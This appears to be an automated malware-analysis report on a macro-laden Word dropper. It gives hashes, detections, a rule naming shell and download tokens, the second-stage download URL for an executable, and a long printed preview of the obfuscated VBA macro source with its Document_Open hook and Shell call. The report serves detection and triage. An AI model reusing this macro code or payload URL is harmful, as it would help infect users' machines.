Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d465ca9b8630bb21…

MALICIOUS

Office (OOXML)

45.8 KB Created: 2019-01-29 16:12:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-08-25
MD5: e016a487ee7d4c3ffee5d4a4bbbeaa6e SHA-1: 6e34aa59207b862656807b17eb1d53f241a4762c SHA-256: d465ca9b8630bb21e53c9c3c7160619e15376332795f642b16a505a3897bb664
272 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample is an Office document containing VBA macros, specifically a Document_Open macro that calls a shell execution function. Heuristics indicate a macro-enable lure and ClamAV detections confirm it is a dropper. The VBA code is heavily obfuscated, but the presence of a Document_Open macro and the shell call strongly suggest it's designed to download and execute a second-stage payload.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-6837211-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6837211-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
             vPID = Shell(itah, 1.1 / 1.1 * 1.1 - 1.1)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://mfae.info/newwork/fresh/soft.exe In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 34022 bytes
SHA-256: 0d859e15b2434d05b0e442768c79cdbc7674e411c74639d9ef831c18d03717f5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
220 of 363 identifiers look randomly generated (e.g. 'iwwnhwibhhtlmyqtwbftwwzcxbidqrwirzacwowp') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Private Sub Document_Open()
Call pcxqujdhubpxk
End Sub

Private Sub pcxqujdhubpxk()

Dim er23405356234 As Byte
Dim uevfuvsexuj As Date
Dim atp
Dim cnwlbgsitp
If 0 = 23 Then
Else
Dim wezzglfqlidvpdj

Dim ktjtqmqf

Dim ychkhyc As Variant
Dim lrsjqzfnfgszyogr As Date

Dim uemjcvawblluyw
Dim zzbpzdke
Dim zhlwnlilbsrav



lrsjqzfnfgszyogr = 44
Do While 675 < 5
   Select Case gsjgpz
            Case "¢µñð?ÈäÍɵ?ó¨§", "«¼ôð?ÆçËÖ²?å°", "?ÃÛð?°ö½Ü±?ë??Äì"
                 kmjbutl = "?Éðó?¶"
            Case "§ºñë?Â", "©³æò Çî¶Õ¤?à«�ÔÖ"
                 suffix = "?ÊÞè?½ò¿Ò¦?î°¦Ó×"
            Case "?¸ã", "?Ëáó�¯ê¹Î®?Û®§ÂÖ"
                 kmjbutl = "§¸ôé?¼ó½×®?å¤?"
            Case Else
                 lxtpcxu = "uytpohlhfxynor"
    End Select
Dim mrdlgmohddaior
Dim zohiilgbfiufvvc
Dim uxivczfzemzz
Exit Do
Randomize
Loop

Dim ptshguapqpwijar As Variant
Dim sxvc As Date

Dim mfesg
Dim iljfsutra
Dim ivnunjxlyj



sxvc = 14
Do While 466 < 1
   Select Case gbsqpgssnxqptzs
            Case "?¼ñß?ÃìÍÏ �", " Ãè", "�ºôæ¤"
                 ievbkqlplekxse = "?²ëì?¿ß¶Éª?ñ§¤Ñ"
            Case "«¸Ý÷?»æÇÓª?Û©¤Îè", "©·ßñ£°í¸Ø´?Ú?"
                 suffix = "«Åßß"
            Case " ¼éê?ÇïÍÓ­?", "?Ãëî?"
                 ievbkqlplekxse = "?ºÜç?Ä"
            Case Else
                 urupfclpqorfnv = "soqtrnedgjueyk"
    End Select
Dim hyhrj
Dim hjnzz
Dim wubqzhxkgftovv
Exit Do
Randomize
Loop

Dim vcmnigkb As Variant
Dim jzdcubvpoosbjsfm As Date

Dim eisyfupxikhigebr
Dim nohcokko
Dim oktqhyxoltgjgo



jzdcubvpoosbjsfm = 73
Do While 539 < 4
   Select Case wvsmj
            Case "£²Üì ÃîÆÉ³ éª", "£Ëàì¡ÆäÀÎ", "?¹åæ?»òÄÊ??àª"
                 dojnmd = "?Ääë?½ê¶"
            Case "?¹îá¢ÅîÁס?ï£?Íä", "¡²ãå "
                 suffix = "¦Çêï¤ÇÞ»Ö£"
            Case "?¶Ûê Âé¹Ô´ ë??", " ÆÝí?¶äÄÕ´?è?�"
                 dojnmd = "©Ãê"
            Case Else
                 nbtgtsrumqc = "sbzjzeob"
    End Select
Dim vfcdfkwblup
Dim zapwqycogfs
Dim kcuxal
Exit Do
Randomize
Loop

Dim zugoboovhjj As Variant
Dim tljtjknixcxgh As Date

Dim gblsfugmpujt
Dim djzufbrldjhsq
Dim mmzxoiwamnzqcnt



tljtjknixcxgh = 39
Do While 551 < 7
   Select Case nprxg
            Case "?Åèå?Å", "?Âîë?·æ¶Ï«", "¥¹ñæ�Åî¹Ú¥"
                 uemyxtnrtvvcfunr = "?´Ýâ?¸ÞÉÛ"
            Case "¦Àäô?Èë¹Ò?", "£»é÷?°ã¾Û³?ó®"
                 suffix = "?Éßè?Ãï¿Ú¯?ì?"
            Case "?¸Ûì�¼àÍÙ´?ð", "?Åèß�½å½Ù³"
                 uemyxtnrtvvcfunr = "?¼äö?¸óÍÒ¨?Þ"
            Case Else
                 sgynjyhtgtzd = "bblaifn"
    End Select
Dim tzwq
Dim gehsphjmduzgo
Dim nnkhznt
Exit Do
Randomize
Loop



End If




If 9 = 8 Then
Dim xecjlupnnv
Else
Dim kcmkeczh

Dim qspwmwppsgseidp As String
qspwmwppsgseidp = "OBuQeWb"

Dim evflykb As String
evflykb = "fmqWdknDV"

Dim dldtemwrqm As String
dldtemwrqm = "."

Application.Run qspwmwppsgseidp & dldtemwrqm & evflykb

End If





Dim qgiv

Dim utdvkxq

End Sub




Attribute VB_Name = "OBuQeWb"
Const qmfrughwvlxgcva = 1
Const vzeslgdnsppz = 2924
Const diijapedgholvvn = 71

#If VBA7 Then

#Else

#End If

#If VBA7 Then
Private Declare PtrSafe Function whyyubwthaztp Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare PtrSafe Function wqpab Lib "user32" Alias "SetPropA" (ByVal hwnd As Long, ByVal lpString As String, ByVal hData As Long) As Long
Private Declare PtrSafe Function djonudaycnalpn Lib "user32" Alias "RemovePropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare PtrSafe Function hnwhbncsrigt Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
Private Declare PtrSafe Function tvvynokhh Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare PtrSafe Function nymtdmj Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#Else
Private Declare  Function whyyubwthaztp Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare  Function wqpab  Lib "user32" Alias "SetPropA" (ByVal hwnd As Long, ByVal lpString As String, ByVal hData As Long) As Long
Private Declare  Function djonudaycnalpn Lib "user32" Alias "RemovePropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare  Function hnwhbncsrigt Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
Private Declare  Function tvvynokhh Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare  Function nymtdmj Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#End If


Private Const chammdlaa = 4
Const dnnujgumg = 5
Private Const hrs = 69
Const zaxtlaplntx = 6834291
Private Const vxunbboore = 2924

Const ojppiuyz = 941287083
Const lcecanqfnalclo = 783
Const xhar = 97

#If VBA7 Then

#Else

#End If

#If VBA7 Then
Private Declare PtrSafe Function axrmqjyeevyx Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare PtrSafe Function pydbawvh Lib "user32" Alias "SetPropA" (ByVal hwnd As Long, ByVal lpString As String, ByVal hData As Long) As Long
Private Declare PtrSafe Function sadghrco Lib "user32" Alias "RemovePropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare PtrSafe Function pvbnsrhgyurk Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
Private Declare PtrSafe Function bemaoabkh Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare PtrSafe Function pfsxmsjkcjo Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#Else
Private Declare  Function axrmqjyeevyx Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare  Function pydbawvh  Lib "user32" Alias "SetPropA" (ByVal hwnd As Long, ByVal lpString As String, ByVal hData As Long) As Long
Private Declare  Function sadghrco Lib "user32" Alias "RemovePropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare  Function pvbnsrhgyurk Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
Private Declare  Function bemaoabkh Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare  Function pfsxmsjkcjo Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#End If


Private Const wzpixvilvcdd = 4
Const dwqekmc = 7
Private Const iirx = 96
Const sjxmdawegyag = 45
Private Const fturodlx = 783

Const ixtwtmmn = 496697748
Const fkehgvhmrsnewujo = 6821
Const korsjemojth = 94

#If VBA7 Then

#Else

#End If

#If VBA7 Then
Private Declare PtrSafe Function izdqtffqlihux Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare PtrSafe Function cvdehk Lib "user32" Alias "SetPropA" (ByVal hwnd As Long, ByVal lpString As String, ByVal hData As Long) As Long
Private Declare PtrSafe Function dzcvml Lib "user32" Alias "RemovePropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare PtrSafe Function lyxnopdugnoyp Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
Private Declare PtrSafe Function qnmbwvmcpbw Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare PtrSafe Function rjtfkfovawu Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#Else
Private Declare  Function izdqtffqlihux Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare  Function cvdehk  Lib "user32" Alias "SetPropA" (ByVal hwnd As Long, ByVal lpString As String, ByVal hData As Long) As Long
Private Declare  Function dzcvml Lib "user32" Alias "RemovePropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare  Function lyxnopdugnoyp Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
Private Declare  Function qnmbwvmcpbw Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare  Function rjtfkfovawu Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#End If


Private Const xoi = 7
Const gcbu = 3
Private Const yhzsjcyefaznech = 81
Const vgaavsmofhik = 48147879
Private Const cwiqlzgnjfd = 6821

Const mzrfademvp = 2277189
Const zvbluk = 1
Const misnxjoavjh = 25

#If VBA7 Then

#Else

#End If

#If VBA7 Then
Private Declare PtrSafe Function ewahtrvnoyrebg Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare PtrSafe Function iqwesbhhuksn Lib "user32" Alias "SetPropA" (ByVal hwnd As Long, ByVal lpString As String, ByVal hData As Long) As Long
Private Declare PtrSafe Function ooamycpdyloxhnx Lib "user32" Alias "RemovePropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare PtrSafe Function jbxifj Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
Private Declare PtrSafe Function lptnjyicgccdp Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare PtrSafe Function mprlqvttjfv Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#Else
Private Declare  Function ewahtrvnoyrebg Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare  Function iqwesbhhuksn  Lib "user32" Alias "SetPropA" (ByVal hwnd As Long, ByVal lpString As String, ByVal hData As Long) As Long
Private Declare  Function ooamycpdyloxhnx Lib "user32" Alias "RemovePropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare  Function jbxifj Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
Private Declare  Function lptnjyicgccdp Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare  Function mprlqvttjfv Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#End If


Private Const zqotlyzohmumraz = 2
Const ipgkxdmcytzcykz = 1
Private Const ruwmwfgdhqo = 52
Const nibzjguax = 0
Private Const bpmxxhg = 1

Const mule = 2
Const rcohaarkqjdagga = 37687435
Const cfxshcgglfzjjnim = 39

#If VBA7 Then

#Else

#End If

#If VBA7 Then
Private Declare PtrSafe Function wrapexejdgsvuovt Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare PtrSafe Function rsi Lib "user32" Alias "SetPropA" (ByVal hwnd As Long, ByVal lpString As String, ByVal hData As Long) As Long
Private Declare PtrSafe Function uaugvyxuiq Lib "user32" Alias "RemovePropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare PtrSafe Function yllcpo Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
Private Declare PtrSafe Function lllngvgmdzmmn Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare PtrSafe Function hkrilgmjfhu Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#Else
Private Declare  Function wrapexejdgsvuovt Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare  Function rsi  Lib "user32" Alias "SetPropA" (ByVal hwnd As Long, ByVal lpString As String, ByVal hData As Long) As Long
Private Declare  Function uaugvyxuiq Lib "user32" Alias "RemovePropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare  Function yllcpo Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
Private Declare  Function lllngvgmdzmmn Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare  Function hkrilgmjfhu Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#End If


Private Const uaovsbh = 5
Const zadqhtw = 2
Private Const hgn = 99
Const acnydu = 3
Private Const cgdrvohydw = 37687435

Const gna = 707733492
Const utww = 395864979
Const witfhojqgxswe = 88

#If VBA7 Then

#Else

#End If

#If VBA7 Then
Private Declare PtrSafe Function veexg Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare PtrSafe Function rgaozpwlddidy Lib "user32" Alias "SetPropA" (ByVal hwnd As Long, ByVal lpString As String, ByVal hData As Long) As Long
Private Declare PtrSafe Function hmoivj Lib "user32" Alias "RemovePropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare PtrSafe Function rqgjdepcudgyon Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
Private Declare PtrSafe Function xaqknqjrz Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare PtrSafe Function ojyymbzextfs Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#Else
Private Declare  Function veexg Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare  Function rgaozpwlddidy  Lib "user32" Alias "SetPropA" (ByVal hwnd As Long, ByVal lpString As String, ByVal hData As Long) As Long
Private Declare  Function hmoivj Lib "user32" Alias "RemovePropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare  Function rqgjdepcudgyon Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
Private Declare  Function xaqknqjrz Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare  Function ojyymbzextfs Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#End If


Private Const dqmkmhcyprhbcgva = 8
Const sjsygiivmci = 1
Private Const yevmbett = 32
Const devbbqiqvyko = 174163
Private Const mkbtkhgf = 395864979





Public Sub fmqWdknDV()

On Error Resume Next

NgoIBOB


 
    Dim yjd As Integer
    Dim wwhvtercjfmkukj As Double
    Dim vxbg As Boolean
    Dim vkrkoafuph As String
    Dim ecekswuhy As String
    Dim weEqXkJyxoptnhzRAQmkOCDONMN As Integer
    Dim fzhyzhmrpfdjvvux As String
    Dim ebqhktiqs As Boolean
    Dim mixoftlgb As Double


    

       Do Until 4810 = 4810
              Dim jkethpsvqynxe
            
            jkethpsvqynxe = wexk
        Loop

                Dim kzeyzask(863) As String
        kzeyzask(2) = "?·ó礱ßÈΣ?"
        kzeyzask(4) = "¨Çóñ?È"
        kzeyzask(1) = "ªµÜá?·ßÊÔ®"
        kzeyzask(4) = CStr(73)

          If roxytcmy = "�Éèê ÂáÈß´?" Then
            Dim yjd73
            
            yjd73 = 6421642182#
        End If


         Select Case 17
            Case Else
        End Select


'kzeyzaskmixoftlgb2415ªµÜá?·ßÊÔ®
'?·ó礱ßÈΣ?¨Çóñ?Èvkrkoafuph
'ebqhktiqsvxbg71449
'7373
'vxbgmixoftlgb71449
'ecekswuhyvkrkoafuph2415
'weEqXkJyxoptnhzRAQmkOCDONMNecekswuhy010647
'ebqhktiqsvkrkoafuph
'yjdecekswuhy#Q14
'vkrkoafuphroxytcmy
'010647ecekswuhy
'2415ebqhktiqs
'731748973
'71449mixoftlgb

For avkoon = 1 To 2415
avkoon = avkoon + 7
Next


For blxrykxysi = 1 To 73
blxrykxysi = blxrykxysi + 7
Next



For cufbzpjuoejumsgjo = 1 To 7317489
cufbzpjuoejumsgjo = cufbzpjuoejumsgjo + 7
Next


For Each mxzetiebeoeuksh In ajtlxgm
    If IsDate(aivlkbowk) And ((7317489 + 2415) / (10647 + 5273)) <> 933437780781# Then
          yknaznxxzgtozfes = "mymizx" & CStr("wjjta")
End If
Next

For vzjiqfitvyiuflcp = 1 To 71449
vzjiqfitvyiuflcp = vzjiqfitvyiuflcp + 7
Next





For fdanma = 1 To 1
fdanma = fdanma + 8
Next


For ymrugiesrurrfq = 1 To 1
ymrugiesrurrfq = ymrugiesrurrfq + 7
Next


For niuhaaeuwzmgs = 1 To 10647
niuhaaeuwzmgs = niuhaaeuwzmgs + 7
Next










'vkoondanmadanmalxrykxysiknhho
'lxrykxysiknhhoxzetiebeoeukshdkuqpikivclxrykxysi
'ufbzpjuoejumsgjolxrykxysilxrykxysiknhho
'zjiqfitvyiuflcpxzetiebeoeukshmrugiesrurrfqknhho
'danmaxzetiebeoeukshiuhaaeuwzmgslxrykxysi
'mrugiesrurrfqknhhoxzetiebeoeukshdkuqpikivclxrykxysi
'iuhaaeuwzmgslxrykxysidkuqpikivclxrykxysi
'xzetiebeoeukshdkuqpikivclxrykxysi
'jkethpsvqynxezjiqfitvyiuflcpdanmadkuqpikivclxrykxysi
'wexkdanmaknhho
'pkjndofbjiwqwxzetiebeoeukshbxooxzjiqfitvyiuflcp
'dkuqpikivclxrykxysidkuqpikivclxrykxysi
'knhhoiuhaaeuwzmgslxrykxysi
'tytpuhdanmamrugiesrurrfqknhho
'bxooxzjiqfitvyiuflcpmrugiesrurrfqknhho
'ªµÜá?·ßÊÔ®Q14
'¨Çóñ?ÈQ11




 
    Dim zlsrxk As Integer
    Dim ale As Double
    Dim wsbqemctxbhsmrle As Boolean
    Dim rhjqtu As String
    Dim naknxcg As String
    Dim nSFkfwKdEbnRoIGLKVEeVHDkiTn As Integer
    Dim laiwzcx As String
    Dim mhqgvtzzvebizh As Boolean
    Dim fbij As Double


    

       Do Until 5701 = 5701
              Dim fbvi
            
            fbvi = nykjsq
        Loop

                Dim yrgyfuhhittdromb(475) As String
        yrgyfuhhittdromb(7) = "©½ëß?À޹ߠ"
        yrgyfuhhittdromb(5) = "«¼òõ?ÈçºÜµ?á¯?Æ"
        yrgyfuhhittdromb(2) = "£³ñð?¼éÇȱ?ï¦?"
        yrgyfuhhittdromb(3) = CStr(22)

          If oyxbbe = " ¿ëï?ÅëÈÙ±?å°?Ì" Then
            Dim zlsrxk22
            
            zlsrxk22 = 51078185012685#
        End If


         Select Case 46
            Case Else
        End Select


'yrgyfuhhittdrombfbij42£³ñð?¼éÇȱ?ï¦?
'©½ëß?À޹ߠ«¼òõ?ÈçºÜµ?á¯?Ærhjqtu
'mhqgvtzzvebizhwsbqemctxbhsmrle6155809
'2222
'wsbqemctxbhsmrlefbij6155809
'naknxcgrhjqtu42
'nSFkfwKdEbnRoIGLKVEeVHDkiTnnaknxcg1
'mhqgvtzzvebizhrhjqtu
'zlsrxknaknxcg#Q14
'rhjqtuoyxbbe
'1naknxcg
'42mhqgvtzzvebizh
'953071422
'6155809fbij

For azasjpmpxiaoelu = 1 To 42
azasjpmpxiaoelu = azasjpmpxiaoelu + 3
Next


For bupmlvcjqwgfaagmj = 1 To 22
bupmlvcjqwgfaagmj = bupmlvcjqwgfaagmj + 8
Next



For cdplno = 1 To 9530714
cdplno = cdplno + 1
Next


For Each mwgosbrwexut In lhucnapytca
    If IsDate(poqiohmcxf) And ((9530714 + 42) / (1 + 24086501)) <> 34149214059985# Then
          mxxwelscx = "spfwebc" & CStr("ziqy")
End If
Next

For vhincbppgthyjoptk = 1 To 6155809
vhincbppgthyjoptk = vhincbppgthyjoptk + 1
Next





For fqqf = 1 To 5108944
fqqf = fqqf + 4
Next


For yayf = 1 To 5108944
yayf = yayf + 6
Next


For nypunfonchbzgo = 1 To 1
nypunfonchbzgo = nypunfonchbzgo + 1
Next










'zasjpmpxiaoeluqqfqqfupmlvcjqwgfaagmjfwgpxjgli
'upmlvcjqwgfaagmjfwgpxjgliwgosbrwexutzlfzbupmlvcjqwgfaagmj
'dplnoupmlvcjqwgfaagmjupmlvcjqwgfaagmjfwgpxjgli
'hincbppgthyjoptkwgosbrwexutayffwgpxjgli
'qqfwgosbrwexutypunfonchbzgoupmlvcjqwgfaagmj
'ayffwgpxjgliwgosbrwexutzlfzbupmlvcjqwgfaagmj
'ypunfonchbzgoupmlvcjqwgfaagmjzlfzbupmlvcjqwgfaagmj
'wgosbrwexutzlfzbupmlvcjqwgfaagmj
'fbvihincbppgthyjoptkqqfzlfzbupmlvcjqwgfaagmj
'nykjsqqqffwgpxjgli
'kgmsjawgosbrwexutvzoqybxwpvswrhincbppgthyjoptk
'zlfzbupmlvcjqwgfaagmjzlfzbupmlvcjqwgfaagmj
'fwgpxjgliypunfonchbzgoupmlvcjqwgfaagmj
'bjxwildqqfayffwgpxjgli
'vzoqybxwpvswrhincbppgthyjoptkayffwgpxjgli
'£³ñð?¼éÇȱ?ï¦?Q14
'«¼òõ?ÈçºÜµ?á¯?ÆQ11









Dim ychkhyc As Variant
Dim lrsjqzfnfgszyogr As Date

Dim uemjcvawblluyw
Dim zzbpzdke
Dim zhlwnlilbsrav



lrsjqzfnfgszyogr = 44
Do While 675 < 5
   Select Case gsjgpz
            Case "¢µñð?ÈäÍɵ?ó¨§", "«¼ôð?ÆçËÖ²?å°", "?ÃÛð?°ö½Ü±?ë??Äì"
                 kmjbutl = "?Éðó?¶"
            Case "§ºñë?Â", "©³æò Çî¶Õ¤?à«�ÔÖ"
                 suffix = "?ÊÞè?½ò¿Ò¦?î°¦Ó×"
            Case "?¸ã", "?Ëáó�¯ê¹Î®?Û®§ÂÖ"
                 kmjbutl = "§¸ôé?¼ó½×®?å¤?"
            Case Else
                 lxtpcxu = "uytpohlhfxynor"
    End Select
Dim mrdlgmohddaior
Dim zohiilgbfiufvvc
Dim uxivczfzemzz
Exit Do
Randomize
Loop

Dim ptshguapqpwijar As Variant
Dim sxvc As Date

Dim mfesg
Dim iljfsutra
Dim ivnunjxlyj



sxvc = 14
Do While 466 < 1
   Select Case gbsqpgssnxqptzs
            Case "?¼ñß?ÃìÍÏ �", " Ãè", "�ºôæ¤"
                 ievbkqlplekxse = "?²ëì?¿ß¶Éª?ñ§¤Ñ"
            Case "«¸Ý÷?»æÇÓª?Û©¤Îè", "©·ßñ£°í¸Ø´?Ú?"
                 suffix = "«Åßß"
            Case " ¼éê?ÇïÍÓ­?", "?Ãëî?"
                 ievbkqlplekxse = "?ºÜç?Ä"
            Case Else
                 urupfclpqorfnv = "soqtrnedgjueyk"
    End Select
Dim hyhrj
Dim hjnzz
Dim wubqzhxkgftovv
Exit Do
Randomize
Loop

Dim vcmnigkb As Variant
Dim jzdcubvpoosbjsfm As Date

Dim eisyfupxikhigebr
Dim nohcokko
Dim oktqhyxoltgjgo



jzdcubvpoosbjsfm = 73
Do While 539 < 4
   Select Case wvsmj
            Case "£²Üì ÃîÆÉ³ éª", "£Ëàì¡ÆäÀÎ", "?¹åæ?»òÄÊ??àª"
                 dojnmd = "?Ääë?½ê¶"
            Case "?¹îá¢ÅîÁס?ï£?Íä", "¡²ãå "
                 suffix = "¦Çêï¤ÇÞ»Ö£"
            Case "?¶Ûê Âé¹Ô´ ë??", " ÆÝí?¶äÄÕ´?è?�"
                 dojnmd = "©Ãê"
            Case Else
                 nbtgtsrumqc = "sbzjzeob"
    End Select
Dim vfcdfkwblup
Dim zapwqycogfs
Dim kcuxal
Exit Do
Randomize
Loop

Dim zugoboovhjj As Variant
Dim tljtjknixcxgh As Date

Dim gblsfugmpujt
Dim djzufbrldjhsq
Dim mmzxoiwamnzqcnt



tljtjknixcxgh = 39
Do While 551 < 7
   Select Case nprxg
            Case "?Åèå?Å", "?Âîë?·æ¶Ï«", "¥¹ñæ�Åî¹Ú¥"
                 uemyxtnrtvvcfunr = "?´Ýâ?¸ÞÉÛ"
            Case "¦Àäô?Èë¹Ò?", "£»é÷?°ã¾Û³?ó®"
                 suffix = "?Éßè?Ãï¿Ú¯?ì?"
